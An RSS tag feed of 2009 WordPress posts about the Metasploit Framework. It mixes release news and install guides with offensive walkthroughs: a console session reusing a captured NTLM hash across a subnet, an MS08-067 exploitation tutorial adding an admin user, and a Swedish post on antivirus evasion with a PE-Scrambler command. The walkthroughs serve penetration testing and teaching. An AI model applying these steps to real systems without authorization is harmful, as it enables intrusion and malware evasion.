<?xml version="1.0" encoding="UTF-8"?><!-- generator="wordpress.com" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>

<channel>
	<title>metasploit &amp;laquo; WordPress.com Tag Feed</title>
	<link>http://en.wordpress.com/tag/metasploit/</link>
	<description>Feed of posts on WordPress.com tagged "metasploit"</description>
	<pubDate>Thu, 03 Dec 2009 07:56:49 +0000</pubDate>

	<generator>http://en.wordpress.com/tags/</generator>
	<language>en</language>

<item>
<title><![CDATA[More IE security woes: Attacks appear imminent as exploit is improved]]></title>
<link>http://cre8group.wordpress.com/2009/11/30/more-ie-security-woes-attacks-appear-imminent-as-exploit-is-improved/</link>
<pubDate>Mon, 30 Nov 2009 14:07:08 +0000</pubDate>
<dc:creator>cre8group</dc:creator>
<guid>http://cre8group.wordpress.com/2009/11/30/more-ie-security-woes-attacks-appear-imminent-as-exploit-is-improved/</guid>
<description><![CDATA[http://infoworld.com/d/security-central/more-ie-security-woes-attacks-appear-imminent-exploit-improv]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p><a href="http://infoworld.com/d/security-central/more-ie-security-woes-attacks-appear-imminent-exploit-improved-104">http://infoworld.com/d/security-central/more-ie-security-woes-attacks-appear-imminent-exploit-improved-104</a></p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Missing npptools.dll in Windows 7]]></title>
<link>http://bruury.wordpress.com/2009/11/25/missing-npptools-dll-in-windows-7/</link>
<pubDate>Wed, 25 Nov 2009 13:19:55 +0000</pubDate>
<dc:creator>Bruury</dc:creator>
<guid>http://bruury.wordpress.com/2009/11/25/missing-npptools-dll-in-windows-7/</guid>
<description><![CDATA[I found this problem when I want to instal Metasploit Framework (MSF) in my Win7 box.  And today I e]]></description>
<content:encoded><![CDATA[I found this problem when I want to instal Metasploit Framework (MSF) in my Win7 box.  And today I e]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Framework in neuer Version 3.3 erschienen]]></title>
<link>http://itsicherheit.wordpress.com/2009/11/22/metasploit-framework-in-neuer-version-3-3-erschienen/</link>
<pubDate>Sun, 22 Nov 2009 17:37:57 +0000</pubDate>
<dc:creator>Guido Strunck</dc:creator>
<guid>http://itsicherheit.wordpress.com/2009/11/22/metasploit-framework-in-neuer-version-3-3-erschienen/</guid>
<description><![CDATA[Das Metasploit-Projekt hat die neue Version 3.3 seiner gleichnamigen Plattform für Pen-Tests bereit ]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Das <a href="http://www.metasploit.com/">Metasploit-Projekt</a> hat die neue Version 3.3 seiner gleichnamigen Plattform für Pen-Tests bereit gestellt. Das aktuelle Release enthält mehr als 440 neue Exploit-Module, 216 weitere Hilfsmodule und ermöglicht die Fernsteuerung von Rechnern über einen eingebauten VNC-Dienst. Außerdem unterstützt die neue Version nun auch IPv6 und kann zur Prüfung von Sicherheitslücken in Microsofts neuem Flaggschiff Windows 7 eingesetzt werden.</p>
<p>Seit der letzten, vor etwa einem Jahr veröffentlichten, Version wurden etwa 180 bekannte Fehler korrigiert, so das <a href="http://digitaloffense.net/">Sicherheitsforscher H.D. Moore</a> darin eine der am intensivsten getesteten Versionen des bekannten Tools sieht. Moore hatte das Metasploit-Projekt 2003 ins Leben gerufen und seine Firma Rapid7 hatte kürzlich die <a href="http://www.rapid7.com/metasploit-announcement.jsp">Betreuung des Open-Source–Projektes (BSD-Lizenz) übernommen</a>.</p>
<p>Auf Bugtraq wurde dazu von H.D.Moore eine Mail veröffentlicht, in der er die <a href="http://www.securityfocus.com/archive/1/507927">verschiedenen systemspezifischen Erweiterungen und Verbesserungen der Metasploit-Plattform</a> ausführlich erläutert.</p>
<p>Metasploit Framework ist ein Werkzeug für Penetrationstester, die im Auftrag von Unternehmen oder Prüfgesellschaften die Sicherheit von Netzwerken oder Anwendungen prüfen. Es enthält eine umfangreiche Sammlung von Exploits in Form geskripteter Module, die bekannte Sicherheitslücken in Programmen und Rechnersystemen ausnutzen. So kann ein Penetrationstester fehlende Sicherheitspatches und unzureichende Schutzvorkehrungen finden sowie die Angreifbarkeit von Systemen dokumentieren.</p>
<p>Die offene Verfügbarkeit macht die Exploit-Sammlung auch für privat am Thema Exploits und Security Interessierte sowie für Admins und IT-Experten in Unternehmen interessant. Schon um sich mit dem Stand der Technik beim Thema Pen-Testing und Exploits zu befassen.</p>
<p>Nützlich ist Metasploit vor allem, wenn man einen Rechner „härten“ und das auch austesten will. Metasploit ist auch nützlich, um die Güte eines heuristischen Malware-Scanners zu prüfen. Ein guter Scanner sollte zumindest einige Teile des Pakets als „potentiell gefährlichen Code“ identifizieren können. Erfahrungsgemäß gibt es bei Viren- und sonstigen Scannern große Qualitätsunterschiede bei der heuristischen Schadcode-Erkennung.</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Framework 3.3 Released!]]></title>
<link>http://tweetycoaster.wordpress.com/2009/11/22/metasploit-framework-3-3-released/</link>
<pubDate>Sun, 22 Nov 2009 09:47:33 +0000</pubDate>
<dc:creator>tweetycoaster</dc:creator>
<guid>http://tweetycoaster.wordpress.com/2009/11/22/metasploit-framework-3-3-released/</guid>
<description><![CDATA[We are excited to announce the immediate availability of version 3.3 of the Metasploit Framework. Th]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>We are excited to announce the immediate availability of version 3.3 of the Metasploit Framework. This release includes 446 exploits, 216 auxiliary modules, and hundreds of payloads, including an in-memory VNC service and the Meterpreter. In addition, the Windows payloads now support NX, DEP, IPv6, and the Windows 7 platform. More than 180 bugs were fixed since last year’s release of version 3.2, making this one of the more well-tested releases yet.</p>
<p>Metasploit runs on all modern operating systems, including Linux, Windows, Mac OS X, and most flavors of BSD. Metasploit has been used on a wide range of hardware platforms, from massive Unix mainframes to the Apple® iPhone™. Installers are available for the Windows and Linux platforms, bundling all dependencies into a single package for ease of installation. The latest version of the Metasploit Framework, as well as images, video demonstrations, documentation and installation instructions for many platforms, can be found online at <a href="http://www.metasploit.com/framework/" target="_blank">http://www.metasploit.com/framework/</a>.</p>
<p>source : <a href="http://blog.metasploit.com/2009/11/metasploit-framework-33-released.html?utm_source=feedburner&#38;utm_medium=feed&#38;utm_campaign=Feed%3A+metasploit%2Fblog+(Metasploit+Blog)" target="_blank">http://blog.metasploit.com/2009/11/metasploit-framework-33-released.html?utm_source=feedburner&#38;utm_medium=feed&#38;utm_campaign=Feed%3A+metasploit%2Fblog+(Metasploit+Blog)</a></p>
<p>&#160;</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[BACKTRAIZANDO]]></title>
<link>http://barceludena.wordpress.com/2009/11/20/backtraizando/</link>
<pubDate>Fri, 20 Nov 2009 23:03:17 +0000</pubDate>
<dc:creator>barceludena</dc:creator>
<guid>http://barceludena.wordpress.com/2009/11/20/backtraizando/</guid>
<description><![CDATA[Herramientas: HP Pavilion dv5-1235la Entertainment PC (la mayorìa sirve) + Ubuntu Karmic + acceso a ]]></description>
<content:encoded><![CDATA[Herramientas: HP Pavilion dv5-1235la Entertainment PC (la mayorìa sirve) + Ubuntu Karmic + acceso a ]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit 3.3 ]]></title>
<link>http://securityaspects.wordpress.com/2009/11/19/metasploit-3-3/</link>
<pubDate>Thu, 19 Nov 2009 09:42:18 +0000</pubDate>
<dc:creator>Cezar</dc:creator>
<guid>http://securityaspects.wordpress.com/2009/11/19/metasploit-3-3/</guid>
<description><![CDATA[Ieri a fost released versiunea 3.3 a platformei de pentesting  Metasploit.Ce e nou? In primul rind: ]]></description>
<content:encoded><![CDATA[Ieri a fost released versiunea 3.3 a platformei de pentesting  Metasploit.Ce e nou? In primul rind: ]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit 3.3 Released!]]></title>
<link>http://spl0it.wordpress.com/2009/11/17/metasploit-3-3-released/</link>
<pubDate>Tue, 17 Nov 2009 18:20:43 +0000</pubDate>
<dc:creator>Jabra</dc:creator>
<guid>http://spl0it.wordpress.com/2009/11/17/metasploit-3-3-released/</guid>
<description><![CDATA[HD Moore and the entire Metasploit team have released Metasploit v3.3! I&#8217;m really excited to s]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>HD Moore and the entire Metasploit team have released Metasploit v3.3! I&#8217;m really excited to start using this new release as it provides tons of new features including: 123 new exploits, 117 new auxiliary modules, support for Vista and Windows 7, improved stability of Meterpreter, all applicable exploits now have OSVDB references, Meterpreter with colors and much much more! More details be be found within the <a href="http://www.metasploit.com/redmine/projects/framework/wiki/Release_Notes_33"> Release Notes</a>.</p>
<p><a href="http://www.metasploit.com/framework/download/">Download Metasploit v3.3 here</a></p>
<p>Enjoy Metasploit v3.3!</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Antivirus, trojaner &amp; malware, del2]]></title>
<link>http://hex29a.wordpress.com/2009/11/13/antivirus-trojaner-malware-del2/</link>
<pubDate>Fri, 13 Nov 2009 08:56:52 +0000</pubDate>
<dc:creator>hex29a</dc:creator>
<guid>http://hex29a.wordpress.com/2009/11/13/antivirus-trojaner-malware-del2/</guid>
<description><![CDATA[Här är del 2 i min lilla serie om antivirus, trojaner och malware. (Om du inte redan gjort det, läs ]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Här är del 2 i min lilla serie om antivirus, trojaner och malware. (Om du inte redan gjort det, läs  <a title="Antivirus, trojaner &#38; malware, del1" href="http://hex29a.wordpress.com/2009/11/06/antivirus-trojaner-malware-del1/">Del1</a>)</p>
<p>I denna delen kommer jag berätta lite om hur virusmakare går tillväga för att dölja sina spår och gömma elak kod i program.</p>
<p>Som jag nämnde i förra delen använder sig antivirusprogram av signaturfiler som innehåller bitar av skadlig kod.</p>
<p>När antivirusprogrammet scannar datorn använder den just dessa signaturer för att se om mönstret matchas i någon av filerna på datorn.<br />
Vad händer då om man skulle ändra i koden för viruset eller trojanen? Filen får en annan storlek och kommer få en annan checksumma, kommer då antivirusprogrammet missa den? Troligtvis inte.</p>
<p>De skadliga bitarna i filen kommer se likadana eller snarlika ut när programmet kompilerats. Även om man skulle ändra vissa specifika värden i koden så kommer vissa systemanrop och liknande fortfarande behöva göras vilket kommer avslöja programmets elaka egenskaper. Eftersom jag inte är en programmerare kan jag inte djupare redogöra för hur exakt antivirusprogrammen jobbar men jag kan tänka mig att det är här heuristiken kommer in i bilden. Genom att snappa upp specifika kodsnuttar och mönster  som används vid attacker och annat hyss!</p>
<p>Hur bär sig då en illasinnad hacker åt för att dölja sina elaka program? Jo, det finns ett par sätt att obfuskera, eller dölja kod i filer.</p>
<p><strong>Komprimering</strong></p>
<p>Komprimering är just vad det låter som, man mer eller mindre &#8220;zippar&#8221; den körbara filen. Denna metod har givetvis legitima syften och är inte något som uppfunnits av elaka virusmakare. Att komprimera en körbar fil kan t.ex. användas för att försvåra för personer som vill knäcka ett program för att se hur det fungerar. Även den faktiska storleksminskningen är ibland av nytta när man ska distribuera en applikation över t.ex. internet.<br />
Komprimerade filer kan även kallas <em>packade</em> filer <em>(packed executables).</em></p>
<p><strong>Kryptering</strong></p>
<p>Såväl som man kan komprimera en fil kan man även kryptera den. Detta för att försvåra identifieringen av skadlig kod.</p>
<p>Programmen packas upp och dekrypteras &#8220;on the fly&#8221; när de körs i datorn vilket innebär att även antivirusprogram kan packa upp filer för att analys.</p>
<p>De flesta antivirusprogrammen idag kan läsa komprimerade och krypterade exe-filer.<br />
Packade filer kan ibland få antivirusprogrammen att överreagera då metoderna är vanligt förekommande bland just elakartade program.</p>
<p><strong>Omkodning</strong></p>
<p>För att förvilla antivirusprogrammen ytterligare kan man dölja koden i program genom att kasta om processer och fylla ut filerna med oväsentlig data. Detta gör att programmet fortfarande kan exekveras av datorn men blir svårtydd av antivirusprogrammet.  Det blir helt enkelt för krävande för antivirusprogrammet att gå igenom den elaka datan.</p>
<p>För att råda bot på detta får man analysera och försöka  identifiera vilken algoritm  som använts och söka efter den i programmet.</p>
<p>Samtliga metoder kan användas och upprepas multipla gånger för att förändra signaturen för filen.</p>
<p>Exempel på program som kan dölja kod är till exempel PE-Scrambler skrivet av Nick Harbour (<a href="http://rnicrosoft.net/">rnicrosoft.net</a>) och msfpayload som är ett program i Metasploit sviten (<a href="http://metasploit.com">metasploit.com</a>). Det senare har även stöd för en mängd olika omkodningsalgoritmer.</p>
<p>Här är ett exempel där jag testar att koda om en fil som uppfattas som skadlig. Det roliga här var att filen fick fler träffar efter den blivit omkodad <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>Jag använde PE-Scrambler på följande sätt:</p>
<blockquote><p>pescambler.exe -i suspektfil.exe -o suspektfil_crypt.exe</p></blockquote>
<p>Här är resultaten från Virus Total:</p>
<p>Först, den okrypterade filen:</p>
<p><img class="aligncenter size-full wp-image-280" title="suspektfil" src="http://hex29a.wordpress.com/files/2009/11/suspektfil2.png" alt="suspektfil" width="450" height="355" /></p>
<p>Den omkodade filen:</p>
<p><img class="aligncenter size-full wp-image-282" title="suspektfil_crypt" src="http://hex29a.wordpress.com/files/2009/11/suspektfil_crypt2.png" alt="suspektfil_crypt" width="450" height="351" /></p>
<p>Detta resultat kan bero på att antivirus-företagen har analyserat PE-Scrambler och att i detta fall gav utslag av bara förekomsten av den specifika  kodningen.</p>
<p>Slut på del2!</p>
<p>I Del3 tänkte jag avsluta genom att dela med mig av lite tankar, funderingar och tips. Stay tuned!</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Menjalankan Metasploit]]></title>
<link>http://opensuselovers.wordpress.com/2009/11/13/menjalankan-metasploit/</link>
<pubDate>Fri, 13 Nov 2009 06:32:45 +0000</pubDate>
<dc:creator>opensuselovers</dc:creator>
<guid>http://opensuselovers.wordpress.com/2009/11/13/menjalankan-metasploit/</guid>
<description><![CDATA[Jika pada artikel sebelumnya kami menjelaskan sedikit tentang bagaiman untuk menginstall. maka disin]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Jika pada artikel sebelumnya kami menjelaskan sedikit tentang bagaiman untuk menginstall. maka disini bagaimana untuk menjalankan.</p>
<p>simpel saja. pertama yang harus dilakukan kita masuk terlebih dahulu ke folder yang ada framework-3.2 yang sebelumnya telah di unpack.</p>
<p>cd framework-3.2</p>
<p>setelah itu, disana kita bisa menjalankan msfconsole, dan msfgui. dengan perintah</p>
<p>./msfconsole</p>
<p>dan</p>
<p>./msfgui</p>
<p>Loh gimana dengan Webbase???</p>
<p><!--more--></p>
<p>oke-oke tenang&#8230; kalau web base kita bisa langsung memanggil di serigala api(mozila fire fox) http://127.0.0.1/55555</p>
<p>tapi sebelumnya tetep jalankan terlebih dahulu lewat terminal seperti diatas</p>
<p>./msfweb</p>
<p>lalu panggil http://127.0.0.1/55555</p>
<p>Ada cara lain. kita bisa membuat launcher</p>
<p>click kanan &#8220;Create launcher&#8230;&#8221;</p>
<p><img title="Screenshot-Create Launcher" src="http://csrg.stmik-abg.ac.id/wp-content/uploads/2009/11/Screenshot-Create-Launcher1-300x133.png" alt="Screenshot-Create Launcher" width="300" height="133" /></p>
<p>tamvahkan name misalkan untuk &#8216;msfconsole&#8217;</p>
<p>untuk di Commandnya klik &#8216;Browse&#8217;</p>
<p>cari file msfconsole di direktori framework-3.2 yang sebelumnya telah di unpack.</p>
<p>klik OK. maka akan keluar hasil createnya.</p>
<p>dan begitu seterusnya untuk msfgui dan msfweb.</p>
<p>namun untuk msfweb melihat hasilnya di mozila. dengan memasukan http://127.0.0.1/55555 di address bar.</p>
<p><img title="msf shortcut" src="http://csrg.stmik-abg.ac.id/wp-content/uploads/2009/11/msf-shortcut.png" alt="msf shortcut" width="193" height="234" /></p>
<p>cuba buka msfgui &#62;&#62;&#62;</p>
<p><img title="buka msf" src="http://csrg.stmik-abg.ac.id/wp-content/uploads/2009/11/buka-msf--300x225.png" alt="buka msf" width="300" height="225" /></p>
<p>Hasilnya.</p>
<p><img title="hasil buka" src="http://csrg.stmik-abg.ac.id/wp-content/uploads/2009/11/hasil-buka-300x225.png" alt="hasil buka" width="300" height="225" /></p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Framework 3.3 Release Candidate 1]]></title>
<link>http://tweetycoaster.wordpress.com/2009/11/11/metasploit-framework-3-3-release-candidate-1/</link>
<pubDate>Wed, 11 Nov 2009 09:50:45 +0000</pubDate>
<dc:creator>tweetycoaster</dc:creator>
<guid>http://tweetycoaster.wordpress.com/2009/11/11/metasploit-framework-3-3-release-candidate-1/</guid>
<description><![CDATA[This 3.3 release candidate is an early snapshot of what Metasploit 3.3 will look like. We are lookin]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>This 3.3 release candidate is an early snapshot of what Metasploit 3.3 will look like. We are looking for feedback from the community about the new installers, the stability of the framework itself, and the functional changes between 3.3 and earlier releases of the Metasploit Framework. The 3.3 Draft Release Notes go into detail on the new features and behaviors of this version. For a full list of bug fixes, please refer to the Redmine ChangeLog . If you are a software packager and would like to include Metasploit 3.3 in your distribution or operating system, please contact us via email at msfdev[at]metasploit.com. The final release of 3.3 should occur before the end of November. Metasploit is a Rapid7 Open Source Project.</p>
<p><a href="http://tweetycoaster.wordpress.com/files/2009/11/linux_install.png"><img class="aligncenter size-full wp-image-755" title="linux_install" src="http://tweetycoaster.wordpress.com/files/2009/11/linux_install.png" alt="linux_install" width="450" height="220" /></a></p>
<div id="attachment_756" class="wp-caption aligncenter" style="width: 460px"><a href="http://tweetycoaster.wordpress.com/files/2009/11/windows7_console.png"><img class="size-full wp-image-756" title="windows7_console" src="http://tweetycoaster.wordpress.com/files/2009/11/windows7_console.png" alt="windows7_console" width="450" height="256" /></a><p class="wp-caption-text">Metasploit on Windows 7</p></div>
<p>source : <a href="https://metasploit.com/redmine/projects/framework/wiki/Release_33RC1" target="_blank">https://metasploit.com/redmine/projects/framework/wiki/Release_33RC1</a></p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[owning a windows network]]></title>
<link>http://hexesec.wordpress.com/2009/11/06/owning-a-windows-network/</link>
<pubDate>Fri, 06 Nov 2009 15:56:26 +0000</pubDate>
<dc:creator>jcran</dc:creator>
<guid>http://hexesec.wordpress.com/2009/11/06/owning-a-windows-network/</guid>
<description><![CDATA[so&#8230; you say you were able to grab LM / NTLM hashes from a windows box??? cool. now use them in]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>so&#8230; you say you were able to grab LM / NTLM hashes from a windows box??? cool. now use them in the scanner/smb/login to check &#38; see which systems use the same hashes:</p>
<blockquote><p>msf exploit(psexec) &#62; use scanner/smb/login<br />
msf auxiliary(login) &#62; info</p>
<p>Name: SMB Login Check Scanner<br />
Version: 0<br />
License: Metasploit Framework License (BSD)</p>
<p>Provided by:<br />
tebo &#60;tebo@attackresearch.com&#62;</p>
<p>Basic options:<br />
Name       Current Setting  Required  Description<br />
&#8212;-       &#8212;&#8212;&#8212;&#8212;&#8212;  &#8212;&#8212;&#8211;  &#8212;&#8212;&#8212;&#8211;<br />
RHOSTS                      yes       The target address range or CIDR identifier<br />
RPORT      445              yes       Set the SMB service port<br />
SMBDomain  WORKGROUP        no        SMB Domain<br />
SMBPass                     no        SMB Password<br />
SMBUser    Administrator    no        SMB Username<br />
THREADS    1                yes       The number of concurrent threads</p>
<p>Description:<br />
This module will test a SMB login on a range of machines and report<br />
successful logins. If you have loaded a database plugin and<br />
connected to a database this module will record successful logins<br />
and hosts so you can track your access.</p>
<p>msf auxiliary(login) &#62; set RHOSTS 10.1.1.0/24<br />
RHOSTS =&#62; 10.1.1.0/24<br />
msf auxiliary(login) &#62; set SMBPass XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (hash goes here)<br />
SMBPass =&#62; XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<br />
msf auxiliary(login) &#62; exploit<br />
[*] 10.1.1.6 &#8211; FAILED 0xc000006d &#8211; STATUS_LOGON_FAILURE<br />
[*] 10.1.1.21 &#8211; SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)<br />
[*] Recording successful SMB credentials for 10.1.1.21<br />
[*] 10.1.1.25 &#8211; SUCCESSFUL LOGIN (Windows 5.0)<br />
[*] Recording successful SMB credentials for 10.1.1.25<br />
[*] 10.1.1.29 &#8211; SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)<br />
[*] Recording successful SMB credentials for 10.1.1.29<br />
[*] 10.1.1.28 &#8211; SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)<br />
[*] Recording successful SMB credentials for 10.1.1.28<br />
[*] 10.1.1.31 &#8211; SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 1)</p></blockquote>
<p>To speed it up, set THREADS &#62; 1. Be careful not to set it too high:</p>
<blockquote><p>[*] Error: 10.1.1.189: ActiveRecord::StatementInvalid SQLite3::BusyException: database is locked: INSERT INTO &#8220;hosts&#8221; (&#8220;address&#8221;, &#8220;name&#8221;, &#8220;comm&#8221;, &#8220;os_lang&#8221;, &#8220;mac&#8221;, &#8220;os_sp&#8221;, &#8220;arch&#8221;, &#8220;os_flavor&#8221;, &#8220;address6&#8243;, &#8220;os_name&#8221;, &#8220;desc&#8221;, &#8220;created&#8221;, &#8220;state&#8221;) VALUES(&#8216;10.1.1.189&#8242;, NULL, &#8221;, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, &#8216;2009-11-06 10:48:09&#8242;, &#8216;unknown&#8217;)</p></blockquote>
<p>Thanks to <a href="http://www.attackresearch.com/">tebo</a> for the excellent work. Now, if only it worked with <a href="http://carnal0wnage.blogspot.com/2009/04/automatic-credential-collection-and.html">credcollect</a>.</p>
<div class="zemanta-pixie"><img class="zemanta-pixie-img" src="http://img.zemanta.com/pixy.gif?x-id=45a3b146-db14-8552-a6bc-68600ebbebba" alt="" /></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Instalando Metasploit no Cygwin]]></title>
<link>http://bl4ckh47.wordpress.com/2009/10/24/instalando-metasploit-no-cygwin/</link>
<pubDate>Sat, 24 Oct 2009 03:36:12 +0000</pubDate>
<dc:creator>Lucas A. Araújo</dc:creator>
<guid>http://bl4ckh47.wordpress.com/2009/10/24/instalando-metasploit-no-cygwin/</guid>
<description><![CDATA[Aproveitando uma dica que o André me passou, vou mostra para vocês como podem configurar o Metaspoli]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Aproveitando uma dica que o André me passou, vou mostra para vocês como podem configurar o Metaspolit no cygwin de uma maneira bem simples.</p>
<p>Instale o cygwin (<a rel="nofollow" href="http://www.cygwin.com/">http://www.cygwin.com/</a>)</p>
<p>Para quem não sabe o que é o cygwin, ele é um ambiente linux que roda em windows.</p>
<p>De seguida rode o setup, escolha instalar pela internet &#8230;(servidor etc..)</p>
<p>Instale os pacotes o Ruby e o Subversion<br />
Subversion-ruby ( estao dentro do diretorio DEVEL)</p>
<p>depois digite no shell do cygwin:<br />
$svn co <a rel="nofollow" href="http://metasploit.com/svn/framework3/trunk/">http://metasploit.com/svn/framework3/trunk/</a></p>
<p>Esse comando faz o download via subversion do metasploit (sempre a ultima versao)</p>
<p>Para aceder ao directorio onde se encontra o msf, faça:</p>
<p>$cd /trunk<br />
$ ./msfconsole</p>
<p>Olha ai seu Metasploit rodando ./msfconsole.</p>
<p><img src="http://geocities.yahoo.com.br/placker_sec/metspl.JPG" alt="Imagem" /></p>
<p>Pronto e acabaram-se as restrições que o Metasploit tem no Windows.</p>
<p>Aqui jí podem usufruir dos 4 consoles que o Metasploit tem para oferecer.</p>
<p>a de linha de comando: msfcli<br />
a tipo console: msfconsole<br />
a web: msfweb<br />
e uma relativamente nova em GTK: msfgui</p>
<p>Que para mim o msfcli é o melhor.</p>
<p>Quero agradecer ao André Amorim pela dica&#8230;<img title="Wink" src="http://www.forum-invaders.com.br/phpBB/images/smilies/icon_wink.gif" alt=";)" /></p>
<p>By Placker</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meterpreter Script for Prefetch-Tool]]></title>
<link>http://milo2012.wordpress.com/2009/10/22/meterpreter-script-for-prefetch-tool/</link>
<pubDate>Thu, 22 Oct 2009 16:30:04 +0000</pubDate>
<dc:creator>milo2012</dc:creator>
<guid>http://milo2012.wordpress.com/2009/10/22/meterpreter-script-for-prefetch-tool/</guid>
<description><![CDATA[This is the first meterpreter script I wrote for Metasploit Framework . I have integrated the use of]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>This is the first meterpreter script I wrote for <a href="http://www.metasploit.com/">Metasploit Framework </a><strong>. </strong>I have integrated the use of the prefetch-tool via a meterpreter script.</p>
<p>As mentioned in the previous post, the windows prefetch folder contains information about what the frequently used programs are and based on this information, you can actually find out how the computer was used by the user/roles of the computer in the network.</p>
<p>This meterpreter script is not integrated into Metasploit.  To use it, please follow the below steps</p>
<p>1. Download the below files</p>
<p>a. <a href="http://pastebin.com/f61573e00">PrefetchTool Meterpreter Script</a><br />
b. <a href="http://code.google.com/p/prefetch-tool/">Prefetch Tool Executable</a></p>
<p>2. Copy the prefetchtool.rb file to [&#60;metasploit installation folder&#62;\msf3\scripts\meterpreter] folder</p>
<p>3. Copy prefetch.exe to [&#60;metasploit installation folder&#62;\msf3\data] folder</p>
<p>Check out the demo videos below.<a href="http://www.youtube.com/watch?v=0z1Nuk-w2AU&#38;fmt=22"></a></p>
<p><a href="http://securitytube.net/Metasploit-Post-Exploitation-Meterpreter-Script-Prefetchtool-video.aspx">http://securitytube.net/Metasploit-Post-Exploitation-Meterpreter-Script-Prefetchtool-video.aspx<br />
</a></p>
<p><a href="http://www.youtube.com/watch?v=0z1Nuk-w2AU&#38;fmt=22">http://www.youtube.com/watch?v=0z1Nuk-w2AU&#38;fmt=22<br />
</a><a href="http://vimeo.com/7204412"></a></p>
<p><a href="http://vimeo.com/7204412">http://vimeo.com/7204412</a></p>
<p>If you face any issues or have any cool ideas for new scripts, you can contact me at keith.lee2012[at]gmail.com.   (:</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tasting Metasploit's Power]]></title>
<link>http://themikefiles.wordpress.com/2009/10/14/tasting-metasploits-power/</link>
<pubDate>Wed, 14 Oct 2009 02:01:46 +0000</pubDate>
<dc:creator>themikefiles</dc:creator>
<guid>http://themikefiles.wordpress.com/2009/10/14/tasting-metasploits-power/</guid>
<description><![CDATA[Just got Nessus (Tenable Network Security) version 4 and planning to use it to conduct some vulnerab]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Just got Nessus (Tenable Network Security) version 4 and planning to use it to  conduct some vulnerability assessment in our test lab.  And interestingly, I found lot of machines  vulnerable to MS08-067, which after the said scanning; I tried using Metasploit  v3 to abuse the said flaw.</p>
<table border="0" cellspacing="0" cellpadding="0" width="1172">
<tbody>
<tr>
<td width="25" valign="top">1.</td>
<td width="1146" valign="top">Here I am  showing that my client machine is vulnerable to MS08-067</td>
</tr>
<tr>
<td width="25" valign="top"></td>
<td width="1146" valign="top"><img class="alignnone size-full wp-image-183" title="1" src="http://themikefiles.wordpress.com/files/2009/10/1.jpg?w=497&#038;h=479" alt="1" width="497" height="479" /></td>
</tr>
<tr>
<td width="25" valign="top"></td>
<td width="1146" valign="top"></td>
</tr>
<tr>
<td width="25" valign="top">2.</td>
<td width="1146" valign="top">Now I loaded  up my Metasploit console</td>
</tr>
<tr>
<td width="25" valign="top"></td>
<td width="1146" valign="top"><img class="alignnone size-full wp-image-184" title="2" src="http://themikefiles.wordpress.com/files/2009/10/2.jpg?w=497&#038;h=264" alt="2" width="497" height="264" /></td>
</tr>
<tr>
<td width="25" valign="top"></td>
<td width="1146" valign="top"></td>
</tr>
<tr>
<td width="25" valign="top">3.</td>
<td width="1146" valign="top">I just expand  the Exploits and choose windows and ms08_067_netapi; right-click and select  execute</td>
</tr>
<tr>
<td width="25" valign="top"></td>
<td width="1146" valign="top"><img class="alignnone size-full wp-image-185" title="3" src="http://themikefiles.wordpress.com/files/2009/10/3.jpg?w=497&#038;h=361" alt="3" width="497" height="361" /></td>
</tr>
<tr>
<td width="25" valign="top"></td>
<td width="1146" valign="top"></td>
</tr>
<tr>
<td width="25" valign="top">4.</td>
<td width="1146" valign="top">So Selecting  Target, I just set it to Automatic; here I am showing the current Users list on  my machine</td>
</tr>
<tr>
<td width="25" valign="top"></td>
<td width="1146" valign="top"><img title="4" src="http://themikefiles.wordpress.com/files/2009/10/4.jpg?w=496&#038;h=443" alt="4" width="496" height="443" /></td>
</tr>
<tr>
<td width="25" valign="top"></td>
<td width="1146" valign="top"><img title="5" src="http://themikefiles.wordpress.com/files/2009/10/5.jpg?w=496&#038;h=372" alt="5" width="496" height="372" /></td>
</tr>
<tr>
<td width="25" valign="top"></td>
<td width="1146" valign="top"></td>
</tr>
<tr>
<td width="25" valign="top">5.</td>
<td width="1146" valign="top">After hitting  next, I have now here the Payload which is obviously to add user (with  administrative privilege of course); selecting the options includes the remote  IP and its remote post, username and password for that machine I will try to  add.  I am leaving it to you guys to look  for these options/parameters using Metasploit’s user guide</td>
</tr>
<tr>
<td width="25" valign="top"></td>
<td width="1146" valign="top"><img class="alignnone size-full wp-image-188" title="6" src="http://themikefiles.wordpress.com/files/2009/10/6.jpg?w=497&#038;h=362" alt="6" width="497" height="362" /></td>
</tr>
<tr>
<td width="25" valign="top"></td>
<td width="1146" valign="top"><img class="alignnone size-full wp-image-189" title="7" src="http://themikefiles.wordpress.com/files/2009/10/7.jpg?w=497&#038;h=406" alt="7" width="497" height="406" /></td>
</tr>
<tr>
<td width="25" valign="top"></td>
